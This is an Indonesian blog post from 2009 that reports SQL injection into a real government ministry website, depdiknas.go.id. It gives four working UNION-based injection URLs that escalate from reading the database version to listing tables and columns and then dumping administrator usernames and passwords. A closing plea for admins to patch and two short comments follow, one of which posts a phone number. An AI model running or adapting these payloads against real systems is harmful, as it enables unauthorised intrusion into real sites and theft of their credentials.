12.01.2009

SQLi on DEPDIKNAS.GO.ID

Lagi suntuk terus ngga sengaja nemu vuln di situs www.depdiknas.go.id . Entah benar atau tidak saya kurang percaya . Masa situs pemerintahan depdiknas.go.id bisa di inject...
lihatlah beberapa screenshoot saya berikut ini :













code yang saya masukan :
http://www.depdiknas.go.id/content.php?content=file_forumpend&kdtopik=-6%27+union+all+select+0,1,2,version%28%29,4/*&showf=1


code yang saya masukan :

http://www.depdiknas.go.id/content.php?content=file_forumpend&kdtopik=-6%27+union+all+select+0,1,2,group_concat%28table_name%29,4+from+information_schema.tables+where+table_schema=database%28%29/*&showf=1



code yang saya masukan :

http://www.depdiknas.go.id/content.php?content=file_forumpend&kdtopik=-6%27+union+all+select+0,1,2,group_concat%28column_name%29,4+from+information_schema.columns+where+table_name=0x61646d696e/*&showf=1



code yang saya masukan :

http://www.depdiknas.go.id/content.php?content=file_forumpend&kdtopik=-6%27+union+all+select+0,1,2,group_concat%28ID_USER,%200x3a,PASSWORD%29,4+from+admin/*&showf=1

Ternyata setalah di test tidak hanya depdiknas.go.id saja yang vuln masih banyak situs pemerintah kita yang vuln. Wahai para ADMIN dimanakah kalian...patch segera bugs situs negara kita !!!!

2 komentar:

  1. opo iki....kasian bgt....>.<

    lanjutkan

    BalasHapus
  2. Kan adminnya uda aku kasih tau...mau telpn adminya po? ni no hp nya 0818227005 ...coba aja

    BalasHapus

Silahkan tinggalkan komentar anda di sini...
makasih ya uda kasih komentar...
sering - sering maen sini ya...
No SaRa, No PoLiTiCs, No SPaMMiNG!!!